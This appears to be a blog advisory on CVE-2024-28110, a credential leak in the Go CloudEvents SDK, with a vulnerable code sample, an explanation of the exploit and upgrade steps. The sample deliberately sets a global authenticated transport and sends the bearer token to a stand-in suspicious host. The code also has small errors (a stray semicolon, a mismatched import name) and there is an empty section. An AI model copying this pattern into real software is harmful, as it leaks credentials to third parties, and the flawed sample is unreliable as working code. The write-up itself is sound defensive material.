CVE-2024-28110 - Credential Leak in Go CloudEvents SDK—What You Need To Know

If you're using CloudEvents in your Go apps, pay close attention—there’s a new vulnerability you must know about. CVE-2024-28110 is a serious bug in the Go CloudEvents SDK (github.com/cloudevents/sdk-go) that could put your HTTP credentials at risk. In this article, I’ll break down what went wrong, how the exploit works, show some code, and tell you exactly how to keep your projects safe.

What is CloudEvents?

CloudEvents is a specification for describing event data in a common way. The Go SDK is the official tool for integrating Go applications with CloudEvents. It's used everywhere—from cloud-native apps to serverless functions.

What is CVE-2024-28110?

CVE-2024-28110 impacts Go SDK for CloudEvents in versions before 2.15.2. The vulnerability lets sensitive credentials (like Authorization tokens) leak to arbitrary HTTP endpoints.

How?
When you use cloudevents.WithRoundTripper to create an authenticated CloudEvents client, the SDK changes the global http.DefaultClient—not just your own. This means any HTTP request your app (or a library you use!) makes through http.DefaultClient can accidentally send your Authorization headers to places they don’t belong.

Fixed in: v2.15.2
Original Advisory:
GitHub Security Advisory GHSA-v776-q48j-99jh
NVD Entry CVE-2024-28110

The SDK internally sets *http.DefaultClient*’s transport to your authenticated transport.

4. Now, anywhere in your app (or in libraries) that uses http.DefaultClient will unknowingly use your custom transport, leaking credentials to any endpoint it connects to—not just your CloudEvents endpoint!

Example Vulnerable Code

package main

import (
	"net/http"
	"github.com/cloudevents/sdk-go/v2/client"
	"github.com/cloudevents/sdk-go/v2/protocol/http"
)

// Custom transport with credentials
func AuthTransport(token string) http.RoundTripper {
	return &transportWithAuth{
		token:  token,
		inner:  http.DefaultTransport,
	}
}

type transportWithAuth struct {
	token string
	inner http.RoundTripper
}

func (t *transportWithAuth) RoundTrip(req *http.Request) (*http.Response, error) {
	req.Header.Set("Authorization", "Bearer "+t.token)
	return t.inner.RoundTrip(req)
}

func main() {
	// BAD: sets authenticated transport globally!
	p, _ := cloudeventshttp.New(
		cloudeventshttp.WithRoundTripper(AuthTransport("SECRET-TOKEN")),
	)
	c, _ := client.New(p)

	// Any other HTTP request using http.DefaultClient will now send your secret token!
	http.Get("https://api.suspicious.example.com";) // <--- leaks Authorization header!
}

The Exploit Explained

Attackers don't need to access your CloudEvents traffic—they just lure your code or dependencies to make an HTTP call via http.DefaultClient (say, to download an image, check an update, or follow a redirect). Suddenly, your Authorization token is sent with the request. This could allow attackers to steal tokens or compromise other protected services.

Who’s affected?

Remediation

Upgrade Immediately:
Update your github.com/cloudevents/sdk-go/v2 dependency to at least v2.15.2.

go get github.com/cloudevents/sdk-go/v2@v2.15.2
go mod tidy

Check your code for this pattern:
If you’re using WithRoundTripper, make sure to test that other HTTP calls aren’t leaking credentials.

How Was It Patched?

Starting in v2.15.2, the SDK carefully ensures that its own protocol client uses the custom transport without mutating http.DefaultClient—meaning other parts of your app remain safe.

Patched code reference:
github.com/cloudevents/sdk-go/commit/09f1eaa...

Simple Mitigation Tips

- Never trust third-party libraries to “do the right thing” with shared Go globals like http.DefaultClient.
- If you need custom HTTP authentication, prefer passing an isolated *http.Client to transport, not just a RoundTripper.

Search your code for WithRoundTripper.

- Review all HTTP requests, especially those that use the default client after setting CloudEvents transport.
- Use network inspection tools in local testing to spot unwanted Authorization headers on external HTTP calls.

Summary

CVE-2024-28110 is a real-world example of why mutating global state is risky—especially in popular frameworks. A simple option to add authentication exposed credentials to any endpoint your Go app touched via the default HTTP client.

References

- GitHub Security Advisory GHSA-v776-q48j-99jh
- NVD CVE-2024-28110
- Upstream fix commit
- CloudEvents Go SDK on GitHub


Stay safe out there and keep your tokens secret! If you have questions about Go security, drop them below.

Timeline

Published on: 03/06/2024 22:15:57 UTC
Last modified on: 03/07/2024 13:52:27 UTC